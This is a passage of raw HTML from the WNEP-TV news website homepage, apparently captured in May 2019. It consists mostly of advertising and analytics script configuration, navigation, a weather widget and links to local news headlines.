[{"slotID":"acm-tag-728x90-atf","sizes":[[970,250],[970,66],[970,90],[728,90]],"slotName":"\/7287\/WNEP\/acm-tag-728x90-atf"},{"slotID":"acm-tag-728x90-btf","sizes":[[970,250],[970,66],[728,90]],"slotName":"\/7287\/WNEP\/acm-tag-728x90-btf"},{"slotID":"acm-tag-300x250-atf","sizes":[[300,250]],"slotName":"\/7287\/WNEP\/acm-tag-300x250-atf"},{"slotID":"acm-tag-300x250-btf0","sizes":[[728,90],[300,250]],"slotName":"\/7287\/WNEP\/acm-tag-300x250-btf0"},{"slotID":"acm-tag-300x250-btf","sizes":[[300,250]],"slotName":"\/7287\/WNEP\/acm-tag-300x250-btf"},{"slotID":"acm-tag-300x250-btf1","sizes":[[300,250]],"slotName":"\/7287\/WNEP\/acm-tag-300x250-btf1"},{"slotID":"acm-tag-300x250-btf2","sizes":[[300,250]],"slotName":"\/7287\/WNEP\/acm-tag-300x250-btf2"},{"slotID":"acm-tag-300x250-btf3","sizes":[[300,250]],"slotName":"\/7287\/WNEP\/acm-tag-300x250-btf3"},{"slotID":"acm-tag-300x250-mid","sizes":[[300,250],[300,600]],"slotName":"\/7287\/WNEP\/acm-tag-300x250-mid"},{"slotID":"acm-tag-300x250-intext","sizes":[[300,250]],"slotName":"\/7287\/WNEP\/acm-tag-300x250-intext"},{"slotID":"acm-tag-oop","sizes":[[1,1]],"slotName":"\/7287\/WNEP\/acm-tag-oop"}]; var A9SlotBase = "\/7287\/WNEP\/"; var PrebidISTag = {"code":"acm-tag-300x250-btf>3","mediaTypes":{"banner":{"sizes":[[300,250]]}},"bids":[{"bidder":"appnexusAst","params":{"placementId":"11730479"}},{"bidder":"criteo","params":{"zoneId":"1141903"}},{"bidder":"ix","params":{"id":"511","siteId":"205824","size":[300,250]}},{"bidder":"openx","params":{"unit":"539153771","delDomain":"tribunemedia-d.openx.net"}},{"bidder":"rubicon","params":{"accountId":"10043","siteId":"145054","zoneId":"680338"}}]}; var PrebidConfig = {"url":"https:\/\/cdn2.trb.tv\/prebid\/prebid-2.12.0.js","debug":"","rubiconId":"10043","timeout":"1000","criteoScript":"https:\/\/static.criteo.net\/js\/ld\/native\/stickytribune.js"}; /* ]]> */ </script> <script type='text/javascript' src='https://s2.wp.com/_static/??-eJyFj8EOgjAQRH/IUjgQ5GD8FigLbqXb2t1C8OstxouRxGSSPczLzKxeg0IycxqAtc16JIjb5xSWTzoDxpMAye4Hz+KAuZvgwHW+xxlUYogZIMnRoz/gvluQFoT1L2ZBQmfuKgLj86ddbpB36QWDloh9IlBhThMS6864HRtxen8QocdBVUWZI67uUtV109Zle27sC54GY04='></script> <script type='text/javascript' src='https://r-login.wordpress.com/remote-login.php?m=1552505935h&#038;action=js&#038;host=wnep.com&#038;id=29519678&#038;t=1558023671&#038;back=https%3A%2F%2Fwnep.com%2F&#038;ver=1526988078' async defer onload='check_remote_login()'></script> <script type='text/javascript'> function check_remote_login() { if ( 'function' === typeof WPRemoteLogin ) { document.cookie = "wordpress_test_cookie=test; path=/"; if ( document.cookie.match( /(;|^)\s*wordpress_test_cookie\=/ ) ) { WPRemoteLogin(); } } } </script> <script type='text/javascript'> /* <![CDATA[ */ var SafeCommentsAjax = {"ajaxurl":"https:\/\/wnep.com\/wp-admin\/admin-ajax.php"}; /* ]]> */ </script> <script type='text/javascript' src='https://s2.wp.com/_static/??-eJxtjEsSwiAQRC8kGfNx4cLyLEhGhYIBmSHR20tSyS6rrnr9umFOykQSJAF5Y0CGySbw0Wgvk+rAMSRfXpa49jmKeFQjPmIhg43jExwf7BvWT1QZU8xStRCqxsundvq7zy0ZX0ZcOSdLR9x9CubfFs1m3cOtvbTXrj/3w+D+eRhKsg=='></script> <link rel='stylesheet' id='all-css-0-2' href='https://s0.wp.com/wp-content/mu-plugins/highlander-comments/style.css?m=1530132353h&cssminify=yes' type='text/css' media='all' /> <!--[if lt IE 8]> <link rel='stylesheet' id='highlander-comments-ie7-css' href='https://s2.wp.com/wp-content/mu-plugins/highlander-comments/style-ie7.css?m=1351637563h&#038;ver=20110606' type='text/css' media='all' /> <![endif]--> <link rel="EditURI" type="application/rsd+xml" title="RSD" href="https://localtvwnep.wordpress.com/xmlrpc.php?rsd" /> <link rel="wlwmanifest" type="application/wlwmanifest+xml" href="https://s1.wp.com/wp-includes/wlwmanifest.xml" /> <meta name="generator" content="WordPress.com" /> <link rel='shortlink' href='http://link.wnep.com/18NeD0F' /> <!-- Jetpack Open Graph Tags --> <meta property="og:type" content="website" /> <meta property="og:title" content="WNEP.com" /> <meta property="og:description" content="News, Weather &amp; Sports from WNEP-TV -- Proud to Serve Northeastern and Central Pennsylvania" /> <meta property="og:url" content="https://wnep.com/" /> <meta property="og:site_name" content="WNEP.com" /> <meta property="og:image" content="https://secure.gravatar.com/blavatar/8f6f6b83745b5040a1eab22f36eb2434?s=600&amp;ts=1558023671" /> <meta property="og:image:width" content="600" /> <meta property="og:image:height" content="600" /> <meta property="og:locale" content="en_US" /> <meta name="twitter:creator" content="@wnep" /> <meta name="twitter:site" content="@wnep" /> <meta property="twitter_card" content="app" /> <meta property="article:publisher" content="http://www.facebook.com/Newswatch16" /> <meta property="article:author" content="http://www.facebook.com/Newswatch16" /> <!-- End Jetpack Open Graph Tags --> <link rel="shortcut icon" type="image/x-icon" href="https://secure.gravatar.com/blavatar/8f6f6b83745b5040a1eab22f36eb2434?s=32" sizes="16x16" /> <link rel="icon" type="image/x-icon" href="https://secure.gravatar.com/blavatar/8f6f6b83745b5040a1eab22f36eb2434?s=32" sizes="16x16" /> <link rel="apple-touch-icon-precomposed" href="https://secure.gravatar.com/blavatar/8f6f6b83745b5040a1eab22f36eb2434?s=114" /> <link rel='openid.server' href='https://localtvwnep.wordpress.com/?openidserver=1' /> <link rel='openid.delegate' href='https://localtvwnep.wordpress.com/' /> <link rel="search" type="application/opensearchdescription+xml" href="https://wnep.com/osd.xml" title="WNEP.com" /> <link rel="search" type="application/opensearchdescription+xml" href="https://s1.wp.com/opensearch.xml" title="WordPress.com" /> <script type="text/javascript"> window._taboola = window._taboola || []; _taboola.push( {"home":"auto"} ); !function (e, f, u) { e.async = 1; e.src = u; f.parentNode.insertBefore(e, f); }(document.createElement('script'), document.getElementsByTagName('script')[0], 'https://cdn.taboola.com/libtrc/localtv-network/loader.js' ); </script> <script> window._newsroom = window._newsroom || []; window._newsroom.push({pageTemplate: 'home'}); window._newsroom.push({pageDashboard: 'home'}); window._newsroom.push('auditClicks'); window._newsroom.push('trackPage'); !function (e, f, u) { e.async = 1; e.src = u; e.defer = 1; f.parentNode.insertBefore(e, f); }(document.createElement('script'), document.getElementsByTagName('script')[0], '//c2.taboola.com/nr/localtv-wnep/newsroom.js' ); </script> <meta property="fb:pages" content="54696907755" /> <script type="text/javascript">var _sf_startpt=(new Date()).getTime()</script> <script type="application/ld+json"> { "@context": "http://schema.org", "@type": "WebSite", "url": "https://wnep.com/", "potentialAction": { "@type": "SearchAction", "target": "https://wnep.com/?s={s}", "query-input": "required name=s" } } </script> <link rel="manifest" href="/manifest.json"> <script src="https://cdn.onesignal.com/sdks/OneSignalSDK.js" async defer></script> <script> var OneSignal = window.OneSignal || []; OneSignal.push(["init", { appId: "cb78eca7-a10f-427e-a2d0-6f090d191499", autoRegister: true, /* Set to true to automatically prompt visitors */ httpPermissionRequest: { enable: true }, notifyButton: { enable: true /* Set to false to hide */ } }]); </script> <script> function get_aamCookie (c_name) { var i,x,y,ARRcookies=document.cookie.split(";"); for (i=0;i<ARRcookies.length;i++) { x=ARRcookies[i].substr(0,ARRcookies[i].indexOf("=")); y=ARRcookies[i].substr(ARRcookies[i].indexOf("=")+1); x=x.replace(/^\s+|\s+$/g,""); if (x==c_name) { return unescape(y); } } } </script> <style> .wpcom-related-posts ul li { list-style-type: none; display: inline-block; } </style> <style type="text/css"> .recentcomments a { display: inline !important; padding: 0 !important; margin: 0 !important; } table.recentcommentsavatartop img.avatar, table.recentcommentsavatarend img.avatar { border: 0px; margin: 0; } table.recentcommentsavatartop a, table.recentcommentsavatarend a { border: 0px !important; background-color: transparent !important; } td.recentcommentsavatarend, td.recentcommentsavatartop { padding: 0px 0px 1px 0px; margin: 0px; } td.recentcommentstextend { border: none !important; padding: 0px 0px 2px 10px; } .rtl td.recentcommentstextend { padding: 0px 10px 2px 0px; } td.recentcommentstexttop { border: none; padding: 0px 0px 0px 10px; } .rtl td.recentcommentstexttop { padding: 0px 10px 0px 0px; } </style> <meta name="application-name" content="WNEP.com" /><meta name="msapplication-window" content="width=device-width;height=device-height" /><meta name="msapplication-tooltip" content="News, Weather &amp; Sports from WNEP-TV -- Proud to Serve Northeastern and Central Pennsylvania" /><meta name="msapplication-task" content="name=Subscribe;action-uri=https://wnep.com/feed/;icon-uri=https://secure.gravatar.com/blavatar/8f6f6b83745b5040a1eab22f36eb2434?s=16" /><script> googletag.cmd.push(function() { googletag.pubads().setTargeting("s1","homepage"); googletag.pubads().setTargeting("pid", "httpswnepcom" ); googletag.pubads().setTargeting("ContentID", "" ); googletag.pubads().setTargeting("Site", "29519678" ); googletag.pubads().setTargeting("test", "" ); ACMTags["728x90-atf"] = googletag.defineSlot( "/7287/ltv.wnep.home/homepage", [[970,250],[970,66],[970,90],[728,90]], "acm-tag-728x90-atf") .addService(googletag.pubads()) .setTargeting( "fold", "atf" ) .setTargeting( "tagId", "728x90-atf" ) .defineSizeMapping(responsiveMappings["SBB"]) ; ACMBatches[ "firstBatchTags" ].push( ACMTags["728x90-atf"] ); ACMTags["728x90-btf"] = googletag.defineSlot( "/7287/ltv.wnep.home/homepage", [[970,250],[970,66],[728,90]], "acm-tag-728x90-btf") .addService(googletag.pubads()) .setTargeting( "fold", "btf" ) .setTargeting( "tagId", "728x90-btf" ) .defineSizeMapping(responsiveMappings["Leaderboard"]) ; ACMBatches[ "secondBatchTags" ].push( ACMTags["728x90-btf"] ); ACMTags["300x250-atf"] = googletag.defineSlot( "/7287/ltv.wnep.home/homepage", [[300,250]], "acm-tag-300x250-atf") .addService(googletag.pubads()) .setTargeting( "fold", "atf" ) .setTargeting( "tagId", "300x250-atf" ) .defineSizeMapping(responsiveMappings["Box"]) ; ACMBatches[ "firstBatchTags" ].push( ACMTags["300x250-atf"] ); ACMTags["300x250-btf"] = googletag.defineSlot( "/7287/ltv.wnep.home/homepage", [[300,250]], "acm-tag-300x250-btf") .addService(googletag.pubads()) .setTargeting( "fold", "btf" ) .setTargeting( "tagId", "300x250-btf" ) .defineSizeMapping(responsiveMappings["Box"]) ; ACMBatches[ "secondBatchTags" ].push( ACMTags["300x250-btf"] ); ACMTags["300x250-btf1"] = googletag.defineSlot( "/7287/ltv.wnep.home/homepage", [[300,250]], "acm-tag-300x250-btf1") .addService(googletag.pubads()) .setTargeting( "fold", "btf" ) .setTargeting( "tagId", "300x250-btf1" ) .defineSizeMapping(responsiveMappings["Box"]) ; ACMBatches[ "secondBatchTags" ].push( ACMTags["300x250-btf1"] ); ACMTags["300x250-btf2"] = googletag.defineSlot( "/7287/ltv.wnep.home/homepage", [[300,250]], "acm-tag-300x250-btf2") .addService(googletag.pubads()) .setTargeting( "fold", "btf" ) .setTargeting( "tagId", "300x250-btf2" ) .defineSizeMapping(responsiveMappings["Box"]) ; ACMBatches[ "secondBatchTags" ].push( ACMTags["300x250-btf2"] ); ACMTags["300x250-mid"] = googletag.defineSlot( "/7287/ltv.wnep.home/homepage", [[300,250],[300,600]], "acm-tag-300x250-mid") .addService(googletag.pubads()) .setTargeting( "fold", "mid" ) .setTargeting( "tagId", "300x250-mid" ) .defineSizeMapping(responsiveMappings["Dualbox"]) ; ACMBatches[ "secondBatchTags" ].push( ACMTags["300x250-mid"] ); ACMTags["120x60-atf"] = googletag.defineSlot( "/7287/ltv.wnep.home/homepage", [[120,60]], "acm-tag-120x60-atf") .addService(googletag.pubads()) .setTargeting( "fold", "atf" ) .setTargeting( "tagId", "120x60-atf" ) .defineSizeMapping(responsiveMappings["Menu"]) ; ACMBatches[ "firstBatchTags" ].push( ACMTags["120x60-atf"] ); ACMTags["oop"] = googletag.defineSlot( "/7287/ltv.wnep.home/homepage", [[1,1]], "acm-tag-oop") .addService(googletag.pubads()) .setTargeting( "fold", null ) .setTargeting( "tagId", "oop" ) ; ACMBatches[ "firstBatchTags" ].push( ACMTags["oop"] ); googletag.pubads().setTargeting("s2",""); var utm_params = {}; window.location.search.replace(/[?&]+([^=&]+)=([^&]*)/gi, function(str,key,value) { utm_params[key.toLowerCase()] = value; } ); for (var k in utm_params) { if(k.indexOf("utm") === 0) googletag.pubads().setTargeting(k,utm_params[k]); } googletag.pubads().enableAsyncRendering(); googletag.pubads().enableSingleRequest(); googletag.pubads().disableInitialLoad(); googletag.pubads().collapseEmptyDivs(); googletag.enableServices(); }); </script> <style type="text/css" id="syntaxhighlighteranchor"></style> <script src="https://s.ntv.io/serve/load.js" async defer></script> </head> <body class="home blog mp6 customizer-styles-applied WNEP highlander-enabled highlander-light infinite-scroll"> <noscript><iframe src="//www.googletagmanager.com/ns.html?id=GTM-MJT7G2" height="0" width="0" style="display:none;visibility:hidden"></iframe></noscript> <header class="navbar navbar-inverse navbar-fixed-top"> <div id="search-form" class="collapse"> <div class="container"> <form class="form-inline" role="search" method="get" action="https://wnep.com/"> <input type="search" placeholder="Search for..." value="" name="s"> <button type="submit" class="btn btn-large btn-inverse"><span class="visible-phone">Go</span><span class="hidden-phone">Search</span></button> </form> <button class="btn btn-close btn-large btn-link" data-toggle="collapse" data-target="#search-form"><i class="icon-remove"></i></button> </div> </div> <nav id="top-navigation" role="navigation"> <div class="container"> <div class="top-nav-left"> <a href="https://wnep.com/live-streaming/" id="btn-livestream" class="btn btn-primary"><i class="icon-play-circle icon-large"></i> Watch Now: <span>Newswatch 16 </span></a> <a href="https://wnep.com/on-air/program-schedule/" class="btn btn-link"><i class="icon-time icon-large"></i> The News Station TV Schedule <span class="text-small"></span></a> </div> <div class="top-nav-right"> <button class="btn btn-link" data-toggle="collapse" data-target="#search-form"><i class="icon-search icon-large"></i><span class="hidden-phone"> Search</span></button> <a href="https://wnep.com/contact/" class="btn btn-link"><i class="icon-envelope icon-large"></i><span class="hidden-phone"> Contact Us</span></a> </div> </div> </nav> <nav id="main-navigation" role="navigation"> <div class="navbar-inner"> <div class="container"> <a class="brand" href="https://wnep.com" title="WNEP.com" rel="home">WNEP.com</a> <button type="button" class="btn btn-navbar" data-toggle="collapse" data-target=".nav-collapse"> <i class="icon-reorder icon-2x pull-left"></i> <span>Menu</span> </button> <div class="nav-collapse collapse"><ul id="menu-with-subcategories" class="nav"><li id="menu-item-1845" class="menu-item menu-item-type-taxonomy menu-item-object-category menu-item-has-children menu-item-1845"><a href="https://wnep.com/category/news/">News</a></li> <li id="menu-item-166678" class="menu-item menu-item-type-taxonomy menu-item-object-category menu-item-has-children menu-item-166678"><a href="https://wnep.com/category/exclusives/">Exclusives</a></li> <li id="menu-item-83211" class="menu-item menu-item-type-taxonomy menu-item-object-category menu-item-has-children menu-item-83211"><a href="https://wnep.com/category/sports/">Sports</a></li> <li id="menu-item-20065" class="menu-item menu-item-type-taxonomy menu-item-object-category menu-item-has-children menu-item-20065"><a href="https://wnep.com/category/on-air/home-backyard/">H&amp;B</a></li> <li id="menu-item-20066" class="menu-item menu-item-type-taxonomy menu-item-object-category menu-item-has-children menu-item-20066"><a href="https://wnep.com/category/on-air/pa-outdoor-life/">P.O.L.</a></li> <li id="menu-item-34643" class="menu-item menu-item-type-taxonomy menu-item-object-category menu-item-has-children menu-item-34643"><a href="https://wnep.com/category/community/">Community</a></li> <li id="menu-item-1843" class="menu-item menu-item-type-post_type menu-item-object-page menu-item-has-children menu-item-1843"><a href="https://wnep.com/on-air/">On-Air</a></li> <li id="menu-item-20358" class="menu-item menu-item-type-taxonomy menu-item-object-category menu-item-20358"><a href="https://wnep.com/category/contests/">Contests</a></li> <li id="menu-item-166922" class="menu-item menu-item-type-post_type menu-item-object-page menu-item-166922"><a href="https://wnep.com/ask-the-professional/">Ask the Pros</a></li> </ul></div> <ul id="nav-weather" class="nav"> <li class="dropdown "> <a href="https://wnep.com/weather/"> <span class="hidden-phone">Weather </span> <i class="wi wi-day-sunny-overcast "></i> <strong class="temp">66&deg;</strong> </a> <ul class="dropdown-menu pull-right text-center" role="menu"> <div class="row-fluid"> <div class="currently span4"> <i class="wi wi-day-sunny-overcast "></i> </div> <div class="temp span4"> <strong>66&deg;</strong> </div> <div class="hi-lo span4"> <div>Low <strong>49&deg;</strong></div> <div>High <strong>68&deg;</strong></div> </div> </div> <hr> <div class="row-fluid"> <div class="span4"> <div>Fri</div> <i class="wi wi-day-showers wi-4x"></i> <div> 53&deg; <i class="icon-caret-right"></i> 72&deg; </div> </div> <div class="span4"> <div>Sat</div> <i class="wi wi-day-sunny-overcast wi-4x"></i> <div> 55&deg; <i class="icon-caret-right"></i> 75&deg; </div> </div> <div class="span4"> <div>Sun</div> <i class="wi wi-day-thunderstorm wi-4x"></i> <div> 64&deg; <i class="icon-caret-right"></i> 78&deg; </div> </div> </div> <a href="https://wnep.com/weather/" class="btn btn-block btn-inverse">See complete forecast</a> </ul> </li> </ul> <div class="ad"> <div id='acm-tag-120x60-atf' class='prebid ad-wrapper' style='width:120px; min-height: 60px;'><script> googletag.cmd.push(function() { googletag.display('acm-tag-120x60-atf'); });</script></div> </div> </div> </div> </nav> </header> <div class="ad ad-top ad-long full-width "> <div id='acm-tag-728x90-atf' class='prebid ad-wrapper' style='width:px; min-height: 90px;'><script> googletag.cmd.push(function() { googletag.display('acm-tag-728x90-atf'); });</script></div> </div> <div id="home-featured" class="full-width"> <div class="container"> <div class="row"> <div class="span8 span12-tablet border-right"> <div class="home-side-images row"> <div class="span4 span6-tablet"><ul class="story-grid thumbnails ignore-equal first"><li class="story span4 span6-tablet has-video"> <div class="extra"><a href="https://wnep.com/category/news/" title="View all posts in News">News</a></div> <div class="timestamp"> 6 mins ago </div> <a class="story-image" href="https://wnep.com/2019/05/16/mother-and-son-charged-with-grocery-store-brawl-in-wayne-county/"><img src="https://s0.wp.com/wp-content/themes/vip/plugins/lazy-load/images/1x1.trans.gif" data-lazy-src="https://localtvwnep.files.wordpress.com/2019/05/brawl.jpeg?quality=85&#038;strip=all&#038;w=370&#038;h=204&#038;crop=1" width="370" height="204" class="attachment-grid-thumbnail size-grid-thumbnail wp-post-image" alt srcset="https://localtvwnep.files.wordpress.com/2019/05/brawl.jpeg?quality=85&amp;strip=all&amp;w=370&amp;h=204&amp;crop=1 370w, https://localtvwnep.files.wordpress.com/2019/05/brawl.jpeg?quality=85&amp;strip=all&amp;w=740&amp;h=408&amp;crop=1 740w, https://localtvwnep.files.wordpress.com/2019/05/brawl.jpeg?quality=85&amp;strip=all&amp;w=150&amp;h=83&amp;crop=1 150w, https://localtvwnep.files.wordpress.com/2019/05/brawl.jpeg?quality=85&amp;strip=all&amp;w=300&amp;h=165&amp;crop=1 300w" sizes="(max-width: 370px) 100vw, 370px"><noscript><img width="370" height="204" src="https://localtvwnep.files.wordpress.com/2019/05/brawl.jpeg?quality=85&amp;strip=all&amp;w=370&amp;h=204&amp;crop=1" class="attachment-grid-thumbnail size-grid-thumbnail wp-post-image" alt="" srcset="https://localtvwnep.files.wordpress.com/2019/05/brawl.jpeg?quality=85&amp;strip=all&amp;w=370&amp;h=204&amp;crop=1 370w, https://localtvwnep.files.wordpress.com/2019/05/brawl.jpeg?quality=85&amp;strip=all&amp;w=740&amp;h=408&amp;crop=1 740w, https://localtvwnep.files.wordpress.com/2019/05/brawl.jpeg?quality=85&amp;strip=all&amp;w=150&amp;h=83&amp;crop=1 150w, https://localtvwnep.files.wordpress.com/2019/05/brawl.jpeg?quality=85&amp;strip=all&amp;w=300&amp;h=165&amp;crop=1 300w" sizes="(max-width: 370px) 100vw, 370px" /></noscript></a> <h4 class="entry-title"><a href="https://wnep.com/2019/05/16/mother-and-son-charged-with-grocery-store-brawl-in-wayne-county/" rel="bookmark">Mother and Son Charged With Grocery Store Brawl In Wayne&nbsp;County</a></h4> </li> </ul></div><div class="span4 span6-tablet"><ul class="story-list with-thumbs"><li class="story has-video"> <a class="story-image" href="https://wnep.com/2019/05/15/three-high-school-administrators-suspended-after-school-prank/"><img src="https://s0.wp.com/wp-content/themes/vip/plugins/lazy-load/images/1x1.trans.gif" data-lazy-src="https://localtvwnep.files.wordpress.com/2019/05/promo382245674.jpg?quality=85&#038;strip=all&#038;w=109&#038;h=60&#038;crop=1" width="109" height="60" class="attachment-tiny-thumbnail size-tiny-thumbnail wp-post-image" alt srcset="https://localtvwnep.files.wordpress.com/2019/05/promo382245674.jpg?quality=85&amp;strip=all&amp;w=109&amp;h=60&amp;crop=1 109w, https://localtvwnep.files.wordpress.com/2019/05/promo382245674.jpg?quality=85&amp;strip=all&amp;w=218&amp;h=120&amp;crop=1 218w, https://localtvwnep.files.wordpress.com/2019/05/promo382245674.jpg?quality=85&amp;strip=all&amp;w=150&amp;h=83&amp;crop=1 150w" sizes="(max-width: 109px) 100vw, 109px"><noscript><img width="109" height="60" src="https://localtvwnep.files.wordpress.com/2019/05/promo382245674.jpg?quality=85&amp;strip=all&amp;w=109&amp;h=60&amp;crop=1" class="attachment-tiny-thumbnail size-tiny-thumbnail wp-post-image" alt="" srcset="https://localtvwnep.files.wordpress.com/2019/05/promo382245674.jpg?quality=85&amp;strip=all&amp;w=109&amp;h=60&amp;crop=1 109w, https://localtvwnep.files.wordpress.com/2019/05/promo382245674.jpg?quality=85&amp;strip=all&amp;w=218&amp;h=120&amp;crop=1 218w, https://localtvwnep.files.wordpress.com/2019/05/promo382245674.jpg?quality=85&amp;strip=all&amp;w=150&amp;h=83&amp;crop=1 150w" sizes="(max-width: 109px) 100vw, 109px" /></noscript></a> <strong class="entry-title"><a href="https://wnep.com/2019/05/15/three-high-school-administrators-suspended-after-school-prank/" rel="bookmark">Three High School Administrators Suspended After School&nbsp;Prank</a></strong> </li> <li class="story has-video"> <a class="story-image" href="https://wnep.com/2019/05/16/alabama-governor-signs-nations-most-restrictive-anti-abortion-bill-into-law/"><img src="https://s0.wp.com/wp-content/themes/vip/plugins/lazy-load/images/1x1.trans.gif" data-lazy-src="https://localtvwnep.files.wordpress.com/2019/05/s109216714.jpg?quality=85&#038;strip=all&#038;w=109&#038;h=60&#038;crop=1" width="109" height="60" class="attachment-tiny-thumbnail size-tiny-thumbnail wp-post-image" alt srcset="https://localtvwnep.files.wordpress.com/2019/05/s109216714.jpg?quality=85&amp;strip=all&amp;w=109&amp;h=60&amp;crop=1 109w, https://localtvwnep.files.wordpress.com/2019/05/s109216714.jpg?quality=85&amp;strip=all&amp;w=218&amp;h=120&amp;crop=1 218w, https://localtvwnep.files.wordpress.com/2019/05/s109216714.jpg?quality=85&amp;strip=all&amp;w=150&amp;h=83&amp;crop=1 150w" sizes="(max-width: 109px) 100vw, 109px"><noscript><img width="109" height="60" src="https://localtvwnep.files.wordpress.com/2019/05/s109216714.jpg?quality=85&amp;strip=all&amp;w=109&amp;h=60&amp;crop=1" class="attachment-tiny-thumbnail size-tiny-thumbnail wp-post-image" alt="" srcset="https://localtvwnep.files.wordpress.com/2019/05/s109216714.jpg?quality=85&amp;strip=all&amp;w=109&amp;h=60&amp;crop=1 109w, https://localtvwnep.files.wordpress.com/2019/05/s109216714.jpg?quality=85&amp;strip=all&amp;w=218&amp;h=120&amp;crop=1 218w, https://localtvwnep.files.wordpress.com/2019/05/s109216714.jpg?quality=85&amp;strip=all&amp;w=150&amp;h=83&amp;crop=1 150w" sizes="(max-width: 109px) 100vw, 109px" /></noscript></a> <strong class="entry-title"><a href="https://wnep.com/2019/05/16/alabama-governor-signs-nations-most-restrictive-anti-abortion-bill-into-law/" rel="bookmark">Alabama Governor Signs Nation&#8217;s Most Restrictive Anti-Abortion Bill into&nbsp;Law</a></strong> </li> <li class="story has-video"> <a class="story-image" href="https://wnep.com/2019/05/16/scranton-shooting-now-ruled-a-homicide/"><img src="https://s0.wp.com/wp-content/themes/vip/plugins/lazy-load/images/1x1.trans.gif" data-lazy-src="https://localtvwnep.files.wordpress.com/2019/05/promo382269613.jpg?quality=85&#038;strip=all&#038;w=109&#038;h=60&#038;crop=1" width="109" height="60" class="attachment-tiny-thumbnail size-tiny-thumbnail wp-post-image" alt srcset="https://localtvwnep.files.wordpress.com/2019/05/promo382269613.jpg?quality=85&amp;strip=all&amp;w=109&amp;h=60&amp;crop=1 109w, https://localtvwnep.files.wordpress.com/2019/05/promo382269613.jpg?quality=85&amp;strip=all&amp;w=218&amp;h=120&amp;crop=1 218w, https://localtvwnep.files.wordpress.com/2019/05/promo382269613.jpg?quality=85&amp;strip=all&amp;w=150&amp;h=83&amp;crop=1 150w" sizes="(max-width: 109px) 100vw, 109px"><noscript><img width="109" height="60" src="https://localtvwnep.files.wordpress.com/2019/05/promo382269613.jpg?quality=85&amp;strip=all&amp;w=109&amp;h=60&amp;crop=1" class="attachment-tiny-thumbnail size-tiny-thumbnail wp-post-image" alt="" srcset="https://localtvwnep.files.wordpress.com/2019/05/promo382269613.jpg?quality=85&amp;strip=all&amp;w=109&amp;h=60&amp;crop=1 109w, https://localtvwnep.files.wordpress.com/2019/05/promo382269613.jpg?quality=85&amp;strip=all&amp;w=218&amp;h=120&amp;crop=1 218w, https://localtvwnep.files.wordpress.com/2019/05/promo382269613.jpg?quality=85&amp;strip=all&amp;w=150&amp;h=83&amp;crop=1 150w" sizes="(max-width: 109px) 100vw, 109px" /></noscript></a> <strong class="entry-title"><a href="https://wnep.com/2019/05/16/scranton-shooting-now-ruled-a-homicide/" rel="bookmark">Scranton Shooting Now Ruled a&nbsp;Homicide</a></strong> </li> <li class="story has-video"> <a class="story-image" href="https://wnep.com/2019/05/16/deadly-crash-in-williamsport/"><img src="https://s0.wp.com/wp-content/themes/vip/plugins/lazy-load/images/1x1.trans.gif" data-lazy-src="https://localtvwnep.files.wordpress.com/2019/05/promo382268969.jpg?quality=85&#038;strip=all&#038;w=109&#038;h=60&#038;crop=1" width="109" height="60" class="attachment-tiny-thumbnail size-tiny-thumbnail wp-post-image" alt srcset="https://localtvwnep.files.wordpress.com/2019/05/promo382268969.jpg?quality=85&amp;strip=all&amp;w=109&amp;h=60&amp;crop=1 109w, https://localtvwnep.files.wordpress.com/2019/05/promo382268969.jpg?quality=85&amp;strip=all&amp;w=218&amp;h=120&amp;crop=1 218w, https://localtvwnep.files.wordpress.com/2019/05/promo382268969.jpg?quality=85&amp;strip=all&amp;w=150&amp;h=83&amp;crop=1 150w" sizes="(max-width: 109px) 100vw, 109px"><noscript><img width="109" height="60" src="https://localtvwnep.files.wordpress.com/2019/05/promo382268969.jpg?quality=85&amp;strip=all&amp;w=109&amp;h=60&amp;crop=1" class="attachment-tiny-thumbnail size-tiny-thumbnail wp-post-image" alt="" srcset="https://localtvwnep.files.wordpress.com/2019/05/promo382268969.jpg?quality=85&amp;strip=all&amp;w=109&amp;h=60&amp;crop=1 109w, https://localtvwnep.files.wordpress.com/2019/05/promo382268969.jpg?quality=85&amp;strip=all&amp;w=218&amp;h=120&amp;crop=1 218w, https://localtvwnep.files.wordpress.com/2019/05/promo382268969.jpg?quality=85&amp;strip=all&amp;w=150&amp;h=83&amp;crop=1 150w" sizes="(max-width: 109px) 100vw, 109px" /></noscript></a> <strong class="entry-title"><a href="https://wnep.com/2019/05/16/deadly-crash-in-williamsport/" rel="bookmark">Deadly Crash in&nbsp;Williamsport</a></strong> </li> </ul></div><div class="span8 span12-tablet"><hr></div><div class="span8 span12-tablet"><ul class="story-grid thumbnails"><li class="story span4 span6-tablet has-video"> <div class="extra"><a href="https://wnep.com/category/news/" title="View all posts in News">News</a></div> <a class="story-image" href="https://wnep.com/2019/05/15/sports-betting-approved-at-mohegan-sun-pocono/"><img src="https://s0.wp.com/wp-content/themes/vip/plugins/lazy-load/images/1x1.trans.gif" data-lazy-src="https://localtvwnep.files.wordpress.com/2019/05/mohegan-sun-pocono-2.jpg?quality=85&#038;strip=all&#038;w=370&#038;h=204&#038;crop=1" width="370" height="204" class="attachment-grid-thumbnail size-grid-thumbnail wp-post-image" alt srcset="https://localtvwnep.files.wordpress.com/2019/05/mohegan-sun-pocono-2.jpg?quality=85&amp;strip=all&amp;w=370&amp;h=204&amp;crop=1 370w, https://localtvwnep.files.wordpress.com/2019/05/mohegan-sun-pocono-2.jpg?quality=85&amp;strip=all&amp;w=740&amp;h=408&amp;crop=1 740w, https://localtvwnep.files.wordpress.com/2019/05/mohegan-sun-pocono-2.jpg?quality=85&amp;strip=all&amp;w=150&amp;h=83&amp;crop=1 150w, https://localtvwnep.files.wordpress.com/2019/05/mohegan-sun-pocono-2.jpg?quality=85&amp;strip=all&amp;w=300&amp;h=165&amp;crop=1 300w" sizes="(max-width: 370px) 100vw, 370px"><noscript><img width="370" height="204" src="https://localtvwnep.files.wordpress.com/2019/05/mohegan-sun-pocono-2.jpg?quality=85&amp;strip=all&amp;w=370&amp;h=204&amp;crop=1" class="attachment-grid-thumbnail size-grid-thumbnail wp-post-image" alt="" srcset="https://localtvwnep.files.wordpress.com/2019/05/mohegan-sun-pocono-2.jpg?quality=85&amp;strip=all&amp;w=370&amp;h=204&amp;crop=1 370w, https://localtvwnep.files.wordpress.com/2019/05/mohegan-sun-pocono-2.jpg?quality=85&amp;strip=all&amp;w=740&amp;h=408&amp;crop=1 740w, https://localtvwnep.files.wordpress.com/2019/05/mohegan-sun-pocono-2.jpg?quality=85&amp;strip=all&amp;w=150&amp;h=83&amp;crop=1 150w, https://localtvwnep.files.wordpress.com/2019/05/mohegan-sun-pocono-2.jpg?quality=85&amp;strip=all&amp;w=300&amp;h=165&amp;crop=1 300w" 